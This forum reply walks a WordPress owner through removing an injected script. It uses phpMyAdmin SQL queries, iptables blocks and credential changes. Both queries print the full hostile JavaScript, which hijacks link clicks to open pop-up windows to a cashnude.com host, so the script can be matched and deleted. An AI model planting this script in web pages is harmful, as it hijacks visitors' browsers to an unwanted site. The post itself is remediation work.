Hello, I'm assuming all your blogs are on the apollocash server. Here is how to remove the injected script and make it harder for it to come back, in 5 steps (these clean up the symptom; finding the way in is covered at the end):
1. Delete ALL cookies in your browser and empty your browser cache, then close the browser. (Do NOT visit the "infected" sites until they are cleaned: the injected script hooks every link click and, on about half of them, opens a window to cashnude.com.)
2. Open your browser again, log into your server's phpMyAdmin and run both cleaning queries below. The queries assume the default `wp_` table prefix and only touch `wp_posts`; if wp-config.php sets a different prefix, or you host several blogs in separate databases, adjust the table name and run them against each database. Take a backup (a phpMyAdmin export of the database) before running any UPDATE.
First query to run is...
Code:
-- Strip the injected script (the <![CDATA[ ... ]]> variant) from every post body.
-- The script hooks link clicks and opens a window to fish-14j-js.cashnude.com.
-- REPLACE only removes an exact, byte-for-byte match of the literal below, so the
-- script text must be pasted unchanged; any other variant of the injection is left
-- in place and needs its own query.
-- Assumes the default "wp_" table prefix -- adjust if wp-config.php sets another one,
-- and back up wp_posts before running any UPDATE.
-- The WHERE clause only limits the write to rows that actually contain the script.
update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
// ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
// ]]></script>%';
And the second query is...
Code:
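-- Strip the second injected variant (the one tagged rel="f179568d...") from every post body.
-- Same script as the first query; only the opening <script> tag differs.
-- FIX: the opening tag contains single quotes (type='text/javascript'). Inside a
-- single-quoted SQL literal each of them must be written as '' or MySQL terminates the
-- string early and reports a syntax error; the pasted version of this query would not run.
-- REPLACE only removes an exact, byte-for-byte match, so the script text itself must be
-- pasted unchanged. Assumes the default "wp_" prefix; back up wp_posts before running.
update wp_posts set post_content = replace(post_content, '<script type=''text/javascript'' rel="f179568d5746648ce97a252d9b3db074">
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
</script>', '') where post_content like '%<script type=''text/javascript'' rel="f179568d5746648ce97a252d9b3db074">
function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})
</script>%';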
You can copy & paste the 2 queries above into phpMyAdmin. Two things to check before you hit Go: (a) the script text sits inside a single-quoted SQL literal, so if the pasted text itself contains single quotes (the `type='text/javascript'` attribute in the second query does) each of those has to be written as `''` inside the literal, otherwise MySQL reports a syntax error; (b) REPLACE only removes an exact match, so afterwards run something like `SELECT ID FROM wp_posts WHERE post_content LIKE '%cashnude.com%'` — any rows still returned hold a variant of the injection that these two queries did not catch.
3. Exit out of PHPMYADMIN and close your browser for now.
4. SSH into your server and add the following rules to your IPTABLES. (They drop all inbound packets from the two addresses below — reportedly the payload site and cashnude servers. Be clear about what this does and does not do: it stops those hosts talking to your server, but it does not stop your visitors' browsers being sent to cashnude.com by the injected script, and the attacker can move to a new address at any time, so treat it as a stop-gap rather than the fix. If you have not created IPTABLES before now (and you should have!) let me know in a reply and I will provide a fresh complete set for you.)
Code:
# Drop inbound packets from the two addresses named in this thread.
# NOTE: "-I INPUT ... -j DROP" only affects traffic arriving at the server from
# these IPs. It does nothing for visitors whose browsers are sent to the
# cashnude.com window by the injected script, and an attacker can move to a
# different address at will -- this is a stop-gap, not the fix.
# -I inserts at the head of the chain, so running these in order leaves the
# second address above the first, exactly as running the two lines by hand.
for badip in 213.207.70.38 31.186.174.178; do
    iptables -I INPUT -s "$badip" -j DROP
done
Then save your new IPTABLES lines with:
Code:
# Persist the running rule set so the DROP rules survive a reboot. This is the
# RHEL/CentOS-style init script; it writes the rules to the distribution's saved
# rules file (typically /etc/sysconfig/iptables -- confirm for your distro). On a
# system without an "iptables" service script, use iptables-save instead.
/sbin/service iptables save
Then restart Apache, for good measure, with:
Code:
# Restart Apache "for good measure". This removes nothing by itself -- the
# cleanup is the SQL above -- it only drops any in-process state the web
# server was holding.
service httpd restart
5. Change your SSH and FTP passwords immediately, and also every WordPress admin password and the database user's password in wp-config.php — the script was written into wp_posts, so assume whatever credential was used to do that is now known to the attacker. If you can, replace plain FTP with SFTP; FTP sends the password in clear text.
As for how they did it, without access to your server I can't give you an honest 100% exact answer. I did, however, take a quick look and it appears your server has not been hardened in any way. I would start by removing your PHPEXEC widgets (very dangerous! — if they do what the name suggests, anyone who can edit a widget can run arbitrary PHP on the server) and then lock the server down to prevent (well, at least make harder, as nothing is 100% secure) this in future. Before calling the server clean, also look for the entry point the SQL cleanup does not touch: recently modified files under the web root (themes, plugins, uploads), WordPress admin users you did not create, and cron entries you do not recognise — a backdoor left in a PHP file will simply re-inject the script.
